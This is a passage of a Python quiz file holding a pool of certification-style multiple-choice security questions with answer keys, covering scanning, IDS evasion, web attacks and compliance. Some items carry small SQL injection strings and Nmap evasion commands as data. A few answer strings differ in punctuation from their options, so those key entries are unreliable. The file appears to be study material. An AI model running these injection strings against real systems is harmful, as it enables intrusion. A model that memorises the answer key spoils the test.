import random
import time
from threading import Thread
from colorama import Fore, Style, init


init()


question_pool = [
    ("What is a set of extensions to DNS that provide to DNS clients (resolvers) origin authentication, authenticated denial of existence and data integrity, but not availability or confidentiality?", "DNSSEC", ["Zone transfer", "Resource transfer", "Resource records", "DNSSEC"]),
    ("Jack sent an email to Jenny with a business proposal. Jenny accepted it and fulfilled all her obligations. Jack suddenly refused his offer when everything was ready and said that he had never sent an email. Which of the following digital signature properties will help Jenny prove that Jack is lying?", "Non-Repudiation", ["Integrity", "Non-Repudiation", "Authentication", "Confidentiality"]),
    ("Which of the following best describes a software firewall?", "Software firewall is placed between the normal application and the networking components of the operating system.", ["Software firewall is placed between the anti-virus application and the IDS components of the operating system.", "Software firewall is placed between the desktop and the software components of the operating system.", "Software firewall is placed between the router and the networking components of the operating system.", "Software firewall is placed between the normal application and the networking components of the operating system."]),
    ("What are the two main conditions for a digital signature?", "Unforgeable and authentic.", ["Unique and have special characters.", "It has to be the same number of characters as a physical signature and must be unique.", "Unforgeable and authentic.", "Legible and neat."]),
    ("Maria is surfing the internet and trying to find information about Super Security LLC. Which process is Maria doing?", "Footprinting", ["Enumeration", "System Hacking", "Footprinting", "Scanning"]),
    ("Maria conducted a successful attack and gained access to a Linux server. She wants to avoid that NIDS will not catch the succeeding outgoing traffic from this server in the future. Which of the following is the best way to avoid detection of NIDS?", "Encryption.", ["Encryption.", "Out of band signaling.", "Alternate Data Streams.", "Protocol Isolation."]),
    ("Ivan, a black hat hacker, sends partial HTTP requests to the target webserver to exhaust the target server’s maximum concurrent connection pool. He wants to ensure that all additional connection attempts are rejected. What type of attack does Ivan implement?", "Slowloris", ["Fragmentation", "Slowloris", "Spoofed Session Flood", "HTTP GET/POST"]),
    ("Define Metasploit module used to perform arbitrary, one-off actions such as port scanning, denial of service, SQL injection and fuzzing?", "Auxiliary Module.", ["Payload Module.", "NOPS Module.", "Exploit Module.", "Auxiliary Module."]),
    ("Which regulation defines security and privacy controls for all U.S. federal information systems except those related to national security?", "NIST-800-53", ["PCI-DSS", "NIST-800-53", "EU Safe Harbor", "HIPAA"]),
    ("Ivan, a black hat hacker, tries to call numerous random numbers inside the company, claiming he is from the technical support service. It offers company employee services in exchange for confidential data or login credentials. What method of social engineering does Ivan use?", "Quid Pro Quo", ["Reverse Social Engineering", "Tailgating", "Quid Pro Quo", "Elicitation"]),
    ("John performs black-box testing. It tries to pass IRC traffic over port 80/TCP from a compromised web-enabled host during the test. Traffic is blocked, but outbound HTTP traffic does not meet any obstacles. What type of firewall checks outbound traffic?", "Application", ["Stateful", "Packet Filtering", "Circuit", "Application"]),
    ("Which layer 3 protocol allows for end-to-end encryption of the connection?", "IPsec", ["SFTP", "IPsec", "SSL", "FTPS"]),
    ("John, a cybersecurity specialist, received a copy of the event logs from all firewalls, Intrusion Detection Systems (IDS) and proxy servers on a company's network. He tried to match all the registered events in all the logs, and he found that their sequence didn't match. What can cause such a problem?", "The network devices are not all synchronized.", ["The security breach was a false positive.", "A proper chain of custody was not observed while collecting the logs.", "The network devices are not all synchronized.", "The attacker altered events from the logs."]),
    ("Which of the following command-line flags set a stealth scan for Nmap?", "-sS", ["-sT", "-sU", "-sS", "-sM"]),
    ("The attacker posted a message and an image on the forum, in which he embedded a malicious link. When the victim clicks on this link, the victim's browser sends an authenticated request to a server. What type of attack did the attacker use?", "Cross-site request forgery", ["Cross-site request forgery", "Cross-site scripting", "SQL injection", "Session hijacking"]),
    ("The Web development team is holding an urgent meeting, as they have received information from testers about a new vulnerability in their Web software. They make an urgent decision to reduce the likelihood of using the vulnerability. The team beside to modify the software requirements to disallow users from entering HTML as input into their Web application. Determine the type of vulnerability that the test team found?", "Cross-site scripting vulnerability.", ["Cross-site scripting vulnerability.", "Cross-site Request Forgery vulnerability.", "SQL injection vulnerability.", "Website defacement vulnerability."]),
    ("You conduct an investigation and finds out that the browser of one of your employees sent malicious requests that the employee knew nothing about. Identify the web page vulnerability that the attacker used when the attack to your employee?", "Cross-Site Request Forgery (CSRF)", ["File Inclusion Attack", "Cross-Site Request Forgery (CSRF)", "Command Injection Attacks", "Hidden Field Manipulation Attack"]),
    ("Identify the type of jailbreaking which allows user-level access and does not allow iboot-level access?", "Userland Exploit", ["Userland Exploit", "Bootrom Exploit", "iBootrom Exploit", "iBoot Exploit"]),
    ("Determine the type of SQL injection: SELECT * FROM user WHERE name = 'x' AND userid IS NULL; --';", "End of Line Comment.", ["UNION SQL Injection.", "End of Line Comment.", "Tautology.", "Illegal/Logically Incorrect Query."]),
    ("Which of the following SQL injection attack does an attacker usually bypassing user authentication and extract data by using a conditional OR clause so that the condition of the WHERE clause will always be true?", "Tautology", ["UNION SQLi", "Error-Based SQLi", "End-of-Line Comment", "Tautology"]),
    ("Which of the following application security testing method of white-box testing, in which only the source code of applications and their components is scanned for determines potential vulnerabilities in their software and architecture?", "SAST", ["IAST", "DAST", "SAST", "MAST"]),
    ("Which of the following is the method of determining the movement of a data packet from an untrusted external host to a protected internal host through a firewall?", "Firewalking", ["MITM", "Firewalking", "Session hijacking", "Network sniffing"]),
    ("Often, for a successful attack, hackers very skillfully simulate phishing messages. To do this, they collect the maximum information about the company that they will attack: emails of real employees (including information about the hierarchy in the company), information about the appearance of the message (formatting, logos), etc. What is the name of this stage of the hacker's work?", "Reconnaissance stage", ["Exploration stage", "Investigation stage", "Reconnaissance stage", "Enumeration stage"]),
    ("Imagine the following scenario: 1. An attacker created a website with tempting content and banner like: 'Do you want to make $10 000 in a month?'. 2. Victim clicks to the interesting and attractive content URL. 3. Attacker creates a transparent 'iframe' in front of the banner which victim attempts to click. Victim thinks that he/she clicks to the 'Do you want to make $10 000 in a month?' banner but actually he/she clicks to the content or URL that exists in the transparent 'iframe' which is set up by the attacker. What is the name of the attack which is described in the scenario?", "Clickjacking Attack", ["Session Fixation", "Clickjacking Attack", "HTML Injection", "HTTP Parameter Pollution"]),
    ("Black hat hacker Ivan wants to implement a man-in-the-middle attack on the corporate network. For this, he connects his router to the network and redirects traffic to intercept packets. What can the administrator do to mitigate the attack?", "Add message authentication to the routing protocol.", ["Use the Open Shortest Path First (OSPF).", "Add message authentication to the routing protocol.", "Use only static routes in the corporation's network.", "Redirection of the traffic is not possible without the explicit admin's confirmation."]),
    ("Which of the options presented below is not a Bluetooth attack?", "Bluedriving", ["Bluesmacking", "Bluesnarfing", "Bluejacking", "Bluedriving"]),
    ("You analyze the logs and see the following output of logs from the machine with the IP address of 192.168.0.132: Time August 21 11:22:06 Port:20 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP Time August 21 11:22:08 Port:21 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP Time August 21 11:22:11 Port:22 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP Time August 21 11:22:14 Port:23 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP Time August 21 11:22:15 Port:25 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP Time August 21 11:22:19 Port:80 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP Time August 21 11:22:21 Port:443 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP What conclusion can you make based on this output?", "Port scan targeting 192.168.0.132", ["Denial of service attack targeting 192.168.0.132", "Port scan targeting 192.168.0.30", "Teardrop attack targeting 192.168.0.132", "Port scan targeting 192.168.0.132"]),
    ("With which of the following SQL injection attacks can an attacker deface a web page, modify or add data stored in a database and compromised data integrity?", "Compromised Data Integrity.", ["Unauthorized access to an application.", "Compromised Data Integrity.", "Loss of data availability.", "Information Disclosure."]),
    ("The attacker enters its malicious data into intercepted messages in a TCP session since source routing is disabled. He tries to guess the responses of the client and server. What hijacking technique is described in this example?", "Blind", ["RST", "TCP/IP", "Blind", "Registration"]),
    ("The attacker tries to take advantage of vulnerability where the application does not verify if the user is authorized to access the internal object via its name or key. Which of the following queries best describes an attempt to exploit an insecure direct object using the name of the valid account 'User 1'?", "\"GET/restricted/accounts/?name=User1 HTTP/1.1 Host: westbank.com\"", ["\"GET/restricted/bank.getaccount('˜User1') HTTP/1.1 Host: westbank.com\"", "\"GET/restricted/goldtransfer?to=Account&from=1 or 1=1' HTTP/1.1 Host: westbank.com\"", "\"GET/restricted/\r\n\%00account%00User1%00access HTTP/1.1 Host: westbank.com\"", "\"GET/restricted/accounts/?name=User1 HTTP/1.1 Host: westbank.com\""]),
    ("What actions should be performed before using a Vulnerability Scanner for scanning a network?", "Checking if the remote host is alive.", ["TCP/IP stack fingerprinting.", "Checking if the remote host is alive.", "TCP/UDP Port scanning.", "Firewall detection."]),
    ("Which of the following is the risk that remains after the amount of risk left over after natural or inherent risks have been reduced?", "Residual risk", ["Residual risk", "Impact risk", "Inherent risk", "Deferred risk"]),
    ("Which of the following incident handling process phases is responsible for defining rules, employees training, creating a back-up, and preparing software and hardware resources before an incident occurs?", "Preparation", ["Recovery", "Containment", "Identification", "Preparation"]),
    ("Wireshark is one of the most important tools for a cybersecurity specialist. It is used for network troubleshooting, analysis, software, etc. And you often have to work with a packet bytes pane. In what format is the data presented in this pane?", "Hexadecimal", ["ASCII only", "Hexadecimal", "Binary", "Decimal"]),
    ("Alex, a cyber security specialist, should conduct a pentest inside the network, while he received absolutely no information about the attacked network. What type of testing will Alex conduct?", "Internal, Black-box.", ["Internal, Black-box.", "External, Black-box.", "Internal, Grey-box.", "Internal, White-box."]),
    ("Victor, a white hacker, received an order to perform a penetration test from the company \"Test us\". He starts collecting information and finds the email of an employee of this company in free access. Victor decides to send a letter to this email, changing the original email address to the email of the boss of this employee, \"boss@testus.com\". He asks the employee to immediately open the \"link with the report\" and check it. An employee of the company \"Test us\" opens this link and infects his computer. Thanks to these manipulations, Viktor gained access to the corporate network and successfully conducted a pentest. What type of attack did Victor use?", "Social engineering", ["Eavesdropping", "Piggybacking", "Social engineering", "Tailgating"]),
    ("Which of the following Nmap's commands allows you to most reduce the probability of detection by IDS when scanning common ports?", "nmap -sT -O -T0", ["nmap -sT -O -T0", "nmap -A --host-timeout 99-T1", "nmap -sT -O -T2", "nmap -A – Pn"]),
    ("Which of the following is a network software suite designed for 802.11 WEP and WPA-PSK keys cracking that can recover keys once enough data packets have been captured?", "Aircrack-ng", ["Aircrack-ng", "WLAN-crack", "Airguard", "Wificracker"]),
    ("Which of the following best describes code injection?", "Form of attack in which a malicious user inserts text into a data field interpreted as code.", ["Form of attack in which a malicious user gains access to the codebase on the server and inserts new code.", "Form of attack in which a malicious user inserts additional code into the JavaScript running in the browser.", "Form of attack in which a malicious user gets the server to execute arbitrary code using a buffer overflow.", "Form of attack in which a malicious user inserts text into a data field interpreted as code."]),
    ("John, a pentester, received an order to conduct an internal audit in the company. One of its tasks is to search for open ports on servers. Which of the following methods is the best solution for this task?", "Scan servers with Nmap.", ["Scan servers with Nmap.", "Scan servers with MBSA.", "Manual scan on each server.", "Telnet to every port on each server."]),
    ("Alex, the penetration tester, performs a server scan. To do this, he uses the method where the TCP Header is split into many packets so that it becomes difficult to determine what packages are used for. Determine the scanning technique that Alex uses?", "IP Fragmentation Scan", ["ACK flag scanning", "TCP Scanning", "IP Fragmentation Scan", "Inverse TCP flag scanning"]),
    ("Which of the following is an encryption technique where data is encrypted by a sequence of photons that have a spinning trait while traveling from one end to another?", "Quantum Cryptography", ["Hardware-Based.", "Quantum Cryptography.", "Homomorphic.", "Elliptic Curve Cryptography."]),
    ("Identify the standard by the description: A regulation contains a set of guidelines that everyone who processes any electronic data in medicine should adhere to. It includes information on medical practices, ensuring that all necessary measures are in place while saving, accessing, and sharing any electronic medical data to secure patient data.", "HIPAA", ["COBIT", "ISO/IEC 27002", "HIPAA", "FISMA"]),
    ("You make a series of interactive queries, choosing subsequent plaintexts based on the information from the previous encryptions. What type of attack are you trying to perform?", "Adaptive chosen-plaintext attack", ["Chosen-plaintext attack", "Ciphertext-only attack", "Known-plaintext attack", "Adaptive chosen-plaintext attack"]),
    ("Which of the following options represents a conceptual characteristic of an anomaly-based IDS over a signature-based IDS?", "Can identify unknown attacks.", ["Can identify unknown attacks.", "Produces less false positives.", "Cannot deal with encrypted network traffic.", "Requires vendor updates for a new threat."]),
    ("Which of the following is a protocol that used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block or an autonomous system?", "WHOIS", ["CAPTCHA", "Internet Engineering Task Force", "Internet Assigned Numbers Authority", "WHOIS"]),
    ("Elon plans to make it difficult for the packet filter to determine the purpose of the packet when scanning. Which of the following scanning techniques will Elon use?", "SYN/FIN scanning using IP fragments.", ["ACK scanning.", "IPID scanning.", "ICMP scanning.", "SYN/FIN scanning using IP fragments."]),
    ("Which of the following will allow you to prevent unauthorized network access to local area networks and other information assets by wireless devices?", "WIPS", ["HIDS", "AISS", "WIPS", "NIDS"]),
    ("Identify Secure Hashing Algorithm, which produces a 160-bit digest from a message on principles similar to those used in MD4 and MD5?", "SHA-1", ["SHA-2", "SHA-1", "SHA-0", "SHA-3"]),
    ("Ivan, the black hat hacker, split the attack traffic into many packets such that no single packet triggers the IDS. Which IDS evasion technique does Ivan use?", "Session Splicing.", ["Unicode Evasion.", "Session Splicing.", "Low-bandwidth attacks.", "Flooding."]),
    ("Which of the following tools is packet sniffer, network detector and IDS for 802.11(a, b, g, n) wireless LANs?", "Kismet", ["Abel", "Nessus", "Nmap", "Kismet"]),
    ("What is the purpose of the demilitarized zone?", "To add an extra layer of security to an organization's local area network.", ["To add a protect to network devices.", "To scan all traffic coming through the DMZ to the internal network.", "To provide a place for a honeypot.", "To add an extra layer of security to an organization's local area network."]),
    ("You managed to compromise a server with an IP address of 10.10.0.5, and you want to get fast a list of all the machines in this network. Which of the following Nmap command will you need?", "nmap -T4 -F 10.10.0.0/24", ["nmap -T4 -F 10.10.0.0/24", "nmap -T4 -r 10.10.1.0/24", "nmap -T4 -q 10.10.0.0/24", "nmap -T4 -p 10.10.0.0/24"]),
    ("Attacker uses various IDS evasion techniques to bypass intrusion detection mechanisms. At the same time, IDS is configured to detect possible violations of the security policy, including unauthorized access and misuse. Which of the following evasion method depend on the Time-to-Live (TTL) fields of a TCP/IP ?", "Insertion Attack", ["Obfuscation", "Unicode Evasion", "Denial-of-Service Attack", "Insertion Attack"]),
    ("alert tcp any any -> 10.199.10.3 21 (msg: \"FTP on the network!\");", "IDS", ["Firewall IPTable", "Router IPTable", "FTP Server rule", "IDS"]),
    ("What is a \"Collision attack\"?", "Сollision attack on a hash tries to find two inputs producing the same hash value.", ["Сollision attack on a hash tries to find two inputs producing the same hash value.", "Collision attacks break the hash into several parts, with the same bytes in each part to get the private key.", "Collision attacks attempt to recover information from a hash.", "Collision attacks try to change the hash."]),
    ("Determine the attack by the description: The known-plaintext attack used against DES. This attack causes that encrypting plaintext with one DES key followed by encrypting it with a second DES key is no more secure than using a single key.", "Meet-in-the-middle attack", ["Traffic analysis attack", "Meet-in-the-middle attack", "Man-in-the-middle attack", "Replay attack"]),
    ("Identify a vulnerability in OpenSSL that allows stealing the information protected under normal conditions by the SSL/TLS encryption used to secure the Internet?", "Heartbleed Bug", ["SSL/TLS Renegotiation Vulnerability", "Heartbleed Bug", "Shellshock", "POODLE"]),
    ("The evil hacker Antonio is trying to attack the IoT device. He will use several fake identities to create a strong illusion of traffic congestion, affecting communication between neighbouring nodes and networks. What kind of attack does Antonio perform?", "Sybil Attack", ["Side-Channel Attack", "Forged Malicious Device", "Sybil Attack", "Exploit Kits"]),
    ("John, a penetration tester, decided to conduct SQL injection testing. He enters a huge amount of random data and observes changes in output and security loopholes in web applications. What SQL injection testing technique did John use?", "Fuzzing Testing", ["Dynamic Testing.", "Static Testing.", "Function Testing.", "Fuzzing Testing."]),
    ("Which of the following Nmap options will you use if you want to scan fewer ports than the default?", "-F", ["-p", "-T", "-sP", "-F"]),
    ("Rajesh, a network administrator found several unknown files in the root directory of his FTP server. He was very interested in a binary file named \"mfs\". Rajesh decided to check the FTP server logs and found that the anonymous user account logged in to the server, uploaded the files and ran the script using a function provided by the FTP server's software. Also, he found that \"mfs\" file is running as a process and it listening to a network port. What kind of vulnerability must exist to make this attack possible?", "File system permissions.", ["File system permissions.", "Privilege escalation.", "Brute force login.", "Directory traversal."]),
    ("Michael works as a system administrator. He receives a message that several sites are no longer available. Michael tried to go to the sites by URL, but it didn't work. Then he tried to ping the sites and enter IP addresses in the browser - it worked. What problem could Michael identify?", "Traffic is Blocked on UDP Port 53", ["Traffic is Blocked on UDP Port 69", "Traffic is Blocked on UDP Port 53", "Traffic is Blocked on UDP Port 88", "Traffic is Blocked on UDP Port 56"]),
    ("Ivan, an evil hacker, conducts an SQLi attack that is based on True/False questions. What type of SQLi does Ivan use?", "Blind SQLi", ["Blind SQLi", "Classic SQLi", "DMS-specific SQLi", "Compound SQLi"]),
    ("Which of the following web application attack inject the special character elements \"Carriage Return\" and \"Line Feed\" into the user’s input to trick the web server, web application, or user into believing that the current object is terminated and a new object has been initiated?", "CRLF Injection.", ["CRLF Injection.", "HTML Injection.", "Log Injection.", "Server-Side JS Injection."]),
    ("John, a system administrator, is learning how to work with new technology: Docker. He will use it to create a network connection between the container interfaces and its parent host interface. Which of the following network drivers is suitable for John?", "Macvlan networking.", ["Bridge networking.", "Macvlan networking.", "Host networking.", "Overlay networking."]),
    ("Mark, the network administrator, must allow UDP traffic on the host 10.0.0.3 and Internet traffic in the host 10.0.0.2. In addition to the main task, he needs to allow all FTP traffic to the rest of the network and deny all other traffic. Mark applies his ACL configuration on the router, and everyone has a problem with accessing FTP. In addition, hosts that are allowed access to the Internet cannot connect to it. In accordance with the following configuration, determine what happened on the network?", "The first ACL is denying all TCP traffic, and the router is ignoring the other ACLs.", ["The ACL for FTP must be before the ACL 110.", "The ACL 104 needs to be first because is UDP.", "The ACL 110 needs to be changed to port 80.", "The first ACL is denying all TCP traffic, and the router is ignoring the other ACLs."]),
    ("Which of the following can be designated as \"Wireshark for CLI\"?", "tcpdump", ["nessus", "tcpdump", "ethereal", "John the Ripper"]),
    ("What is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program?", "Fuzz testing", ["Concolic testing", "Fuzz testing", "Security testing", "Monkey testing"]),
    ("Which one of the following Google search operators allows restricting results to those from a specific website?", "[site:]", ["[link:]", "[inurl:]", "[site:]", "[cache:]"]),
    ("Based on the following data, you need to calculate the approximate cost of recovery of the system operation per year: The cost of a new hard drive is $300; The chance of a hard drive failure is 1/3; The recovery specialist earns $10/hour; Restore the OS and software to the new hard disk - 10 hours; Restore the database from the last backup to the new hard disk - 4 hours; Assume the EF = 1 (100%), calculate the SLE, ARO, and ALE.", "$146", ["$146", "$440", "$960", "$295"]),
    ("John needs to choose a firewall that can protect against SQL injection attacks. Which of the following types of firewalls is suitable for this task?", "Web application firewall.", ["Hardware firewall.", "Packet firewall.", "Stateful firewall.", "Web application firewall."]),
    ("Which of the following is the type of violation when an unauthorized individual enters a building following an employee through the employee entrance?", "Tailgating.", ["Tailgating.", "Pretexting.", "Announced.", "Reverse Social Engineering."]),
    ("Which of the following program attack both the boot sector and executable files?", "Multipartite Virus", ["Polymorphic virus", "Multipartite Virus", "Macro virus", "Stealth virus"]),
    ("The company \"Usual company\" asked a cybersecurity specialist to check their perimeter email gateway security. To do this, the specialist creates a specially formatted email message: From: employee76@usualcompany.com To: employee34@usualcompany.com Subject: Test message Date: 5/8/2021 11:22 He sends this message over the Internet, and a \"Usual company \" employee receives it. This means that the gateway of this company doesn't prevent _____.", "Email Spoofing", ["Email Harvesting", "Email Masquerading", "Email Spoofing", "Email Phishing"]),
    ("Rajesh, the system administrator analyzed the IDS logs and noticed that when accessing the external router from the administrator's computer to update the router configuration, IDS registered alerts. What type of an alert is this?", "False positive", ["False negative", "True positive", "True negative", "False positive"]),
    ("For the company, an important criterion is the immutability of the financial reports sent by the financial director to the accountant. They need to be sure that the accountant received the reports and it hasn't been changed. How can this be achieved?", "Use a hash algorithm in the document once CFO approved the financial statements.", ["Use a hash algorithm in the document once CFO approved the financial statements.", "Reports can send to the accountant using an exclusive USB for that document.", "Use a protected excel file.", "Financial reports can send the financial statements twice, one by email and the other delivered in USB and the accountant can compare both."]),
    ("While using your bank's online servicing you notice the following string in the URL bar: http://www.MyPersonalBank.com/account?id=368940911028389&Damount=10980&Camount=21You observe that if you modify the Damount & Camount values and submit the request, that data on the web page reflect the changes. Which type of vulnerability is present on this site?", "Web Parameter Tampering", ["Web Parameter Tampering", "Cookie Tampering", "SQL injection", "XSS Reflection"]),
    ("Ferdinand installs a virtual communication tower between the two authentic endpoints to mislead the victim. What attack does Ferdinand perform?", "aLTEr", ["Aspidistra", "Wi-Jacking", "Sinkhole", "aLTEr"]),
    ("Which of the following best describes the \"white box testing\" methodology?", "The internal operation of a system is completely known to the tester.", ["The internal operation of a system is completely known to the tester.", "Only the external operation of a system is accessible to the tester.", "Only the internal operation of a system is known to the tester.", "The internal operation of a system is only partly accessible to the tester."]),
    ("Why is a penetration test considered to be better than a vulnerability scan?", "Penetration tests are intended to exploit weaknesses in the architecture of your IT network, while a vulnerability scan does not typically involve active exploitation.", ["The tools used by penetration testers tend to have much more comprehensive vulnerability databases.", "Penetration tests are intended to exploit weaknesses in the architecture of your IT network, while a vulnerability scan does not typically involve active exploitation.", "A penetration test is often performed by an automated tool, while a vulnerability scan requires active engagement.", "Vulnerability scans only do host discovery and port scanning by default."]),
    ("Alex, a cybersecurity specialist, received a task from the head to scan open ports. One of the main conditions was to use the most reliable type of TCP scanning. Which of the following types of scanning should Alex use?", "TCP Connect/Full Open Scan.", ["Half-open Scan.", "TCP Connect/Full Open Scan.", "Xmas Scan.", "NULL Scan."]),
    ("What best describes two-factor authentication for a credit card (using a card and pin)?", "Something you have and something you know.", ["Something you have and something you know.", "Something you have and something you are.", "Something you know and something you are.", "Something you are and something you remember."]),
    ("What means the flag \"-oX\" in a Nmap scan?", "Output the results in XML format to a file.", ["Output the results in truncated format to the screen.", "Run a Xmas scan.", "Output the results in XML format to a file.", "Run an express scan."]),
    ("Which of the following characteristics is not true about the Simple Object Access Protocol?", "Only compatible with the application protocol HTTP.", ["Only compatible with the application protocol HTTP.", "Allows for any programming model.", "Exchanges data between web services.", "Using Extensible Markup Language."]),
    ("Which of the following wireless standard has bandwidth up to 54 Mbit/s and signals in a regulated frequency spectrum around 5 GHz?", "802.11a", ["802.11g", "802.11i", "802.11n", "802.11a"]),
    ("Which of the following cipher is based on factoring the product of two large prime numbers?", "RSA", ["SHA-1", "RSA", "MD5", "RC5"]),
    ("Which of the following command will help you launch the Computer Management Console from\" Run \" windows as a local administrator Windows 7?", "compmgmt.msc", ["gpedit.msc", "ncpa.cpl", "compmgmt.msc", "services.msc"]),
    ("Which of the following does not apply to IPsec?", "Work at the Data Link Layer", ["Work at the Data Link Layer", "Encrypts the payloads", "Provides authentication.", "Use key exchange."]),
    ("According to the Payment Card Industry Data Security Standard, when is it necessary to conduct external and internal penetration testing?", "At least once a year and after any significant upgrade or modification.", ["At least once a year and after any significant upgrade or modification.", "At least twice a year or after any significant upgrade or modification.", "At least once every three years or after any significant upgrade or modification.", "At least once every two years and after any significant upgrade or modification."]),
    ("What identifies malware by collecting data from protected computers while analyzing it on the provider’s infrastructure instead of locally?", "Cloud-based detection", ["Heuristics-based detection", "Behavioural-based detection", "Cloud-based detection", "Real-time protection"]),
    ("You are configuring the connection of a new employee's laptop to join an 802.11 network. The new laptop has the same hardware and software as the laptops of other employees. You used the wireless packet sniffer and found that it shows that the Wireless Access Point (WAR) is not responding to the association requests being sent by the laptop. What can cause this problem?", "The WAP does not recognize the laptop's MAC address.", ["The laptop is configured for the wrong channel.", "The laptop cannot see the SSID of the wireless network.", "The WAP does not recognize the laptop's MAC address.", "The laptop is not configured to use DHCP."]),
    ("Which of the following is a logical collection of Internet-connected devices such as computers, smartphones or Internet of things (IoT) devices whose security has been breached and control ceded to a third party?", "Botnet", ["Spambot", "Botnet", "Spear Phishing", "Rootkit"]),
    ("After several unsuccessful attempts to extract cryptography keys using software methods, Mark is thinking about trying another code-breaking methodology. Which of the following will best suit Mark based on his unsuccessful attempts?", "Trickery and Deceit.", ["Frequency Analysis.", "Trickery and Deceit.", "Brute-Force.", "One-Time Pad."]),
    ("The firewall prevents packets from entering the organization through certain ports and applications. What does this firewall check?", "Application layer headers and transport layer port numbers.", ["Presentation layer headers and the session layer port numbers.", "Application layer port numbers and the transport layer headers.", "Application layer headers and transport layer port numbers.", "Network layer headers and the session layer port numbers."]),
    ("Which of the following requires establishing national standards for electronic health care transactions and national identifiers for providers, health insurance plans, and employers?", "HIPAA", ["SOX", "DMCA", "HIPAA", "PCI-DSS"]),
    ("Identify Bluetooth attack techniques that is used to send messages to users without the recipient's consent, for example for guerrilla marketing campaigns?", "Bluejacking", ["Bluejacking", "Bluesnarfing", "Bluesmacking", "Bluebugging"]),
    ("Which of the following layers in IoT architecture helps bridge the gap between two endpoints, such as a device and a client, and carries out message routing, message identification, and subscribing?", "Access Gateway.", ["Middleware.", "Access Gateway.", "Edge Technology.", "Internet."]),
    ("Session splicing is an IDS evasion technique that exploits how some IDSs do not reconstruct sessions before performing pattern matching on the data. The idea behind session splicing is to split data between several packets, ensuring that no single packet matches any patterns within an IDS signature. Which tool can be used to perform session splicing attacks?", "Whisker", ["Hydra", "tcpsplice", "Whisker", "Burp"]),
    ("Your company has a risk assessment, and according to its results, the risk of a breach in the main company application is 40%. Your cybersecurity department has made changes to the application and requested a re-assessment of the risks. The assessment showed that the risk fell to 12%, with a risk threshold of 20%. Which of the following options would be the best from a business point of view?", "Accept the risk.", ["Introduce more controls to bring risk to 0%.", "Limit the risk.", "Accept the risk.", "Avoid the risk."]),
    ("What actions should you take if you find that the company that hired you is involved with human trafficking?", "Stop work and contact the proper legal authorities.", ["Copy the information to removable media and keep it in case you need it.", "Stop work and contact the proper legal authorities.", "Ignore the information and continue the assessment until the work is done.", "Confront the customer and ask her about this."]),
    ("Viktor, the white hat hacker, conducts a security audit. He gains control over a user account and tries to access another account's sensitive information and files. How can he do this?", "Privilege Escalation", ["Fingerprinting", "Shoulder-Surfing", "Privilege Escalation", "Port Scanning"]),
    ("The evil hacker Ivan has installed a remote access Trojan on a host. He wants to be sure that when a victim attempts to go to \"www.site.com\" that the user is directed to a phishing site. Which file should Ivan change in this case?", "Hosts", ["Boot.ini", "Sudoers", "Hosts", "Networks"]),
    ("Ivan, an evil hacker, is preparing to attack the network of a financial company. To do this, he wants to collect information about the operating systems used on the company's computers. Which of the following techniques will Ivan use to achieve the desired result?", "Banner Grabbing", ["UDP Scanning.", "Banner Grabbing.", "SSDP Scanning.", "IDLE/IPID Scanning."]),
    ("Which of the following option is a security feature on switches leverages the DHCP snooping database to help prevent man-in-the-middle attacks?", "DAI", ["Spanning tree", "Port security", "DHCP relay", "DAI"]),
    ("Michael, a technical specialist, discovered that the laptop of one of the employees connecting to a wireless point couldn't access the Internet, but at the same time, it can transfer files locally. He checked the IP address and the default gateway. They are both on 192.168.1.0/24. Which of the following caused the problem?", "The gateway is not routing to a public IP address.", ["The laptop isn't using a private IP address.", "The laptop and the gateway are not on the same network.", "The laptop is using an invalid IP address.", "The gateway is not routing to a public IP address."]),
    ("You have been assigned the task of defending the company from network sniffing. Which of the following is the best option for this task?", "Using encryption protocols to secure network communications.", ["Restrict Physical Access to Server Rooms hosting Critical Servers.", "Register all machines MAC Address in a Centralized Database.", "Using encryption protocols to secure network communications.", "Use Static IP Address."]),
    ("Let's assume that you decided to use PKI to protect the email you will send. At what layer of the OSI model will this message be encrypted and decrypted?", "Presentation layer.", ["Application layer.", "Session layer.", "Transport layer.", "Presentation layer."]),
    ("Which of the following UDP ports is usually used by Network Time Protocol (NTP)?", "123", ["19", "123", "161", "177"]),
    ("Andrew is conducting a penetration test. He is now embarking on sniffing the target network. What is not available for Andrew when sniffing the network?", "Modifying and replaying captured network traffic.", ["Identifying operating systems, services, protocols and devices.", "Capturing network traffic for further analysis.", "Collecting unencrypted information about usernames and passwords.", "Modifying and replaying captured network traffic."]),
    ("Which of the following methods is best suited to protect confidential information on your laptop which can be stolen while travelling?", "Full disk encryption.", ["BIOS password.", "Hidden folders.", "Full disk encryption.", "Password protected files."]),
    ("How works the mechanism of a Boot Sector Virus?", "Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR.", ["Moves the MBR to another location on the Random-access memory and copies itself to the original location of the MBR.", "Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR.", "Overwrites the original MBR and only executes the new virus code.", "Modifies directory table entries to point to the virus code instead of the actual MBR."]),
    ("Which of the following flags will trigger Xmas scan?", "-sX", ["-sP", "-sA", "-sV", "-sX"]),
    ("Rajesh, a system administrator, noticed that some clients of his company were victims of DNS Cache Poisoning. They were redirected to a malicious site when they tried to access Rajesh's company site. What is the best recommendation to deal with such a threat?", "Use Domain Name System Security Extensions (DNSSEC)", ["Customer awareness", "Use a multi-factor authentication", "Use of security agents on customers' computers.", "Use Domain Name System Security Extensions (DNSSEC)"]),
    ("When configuring wireless on the router, your colleague disables SSID broadcast but leaves authentication \"open\" and sets SSID to a 32-character string of random letters and numbers. Which of the following is the correct statement about this scenario?", "The hacker still has the opportunity to connect to the network after sniffing the SSID from a successful wireless association.", ["Disabling SSID broadcast prevents 802.11 beacons from being transmitted from the access point, resulting in a proper setup leveraging \"security through obscurity\".", "This move will prevent brute-force attacks.", "The hacker still has the opportunity to connect to the network after sniffing the SSID from a successful wireless association.", "The router is still vulnerable to wireless hacking attempts because the SSID broadcast setting can be enabled using a specially crafted packet sent to the access point's hardware address."]),
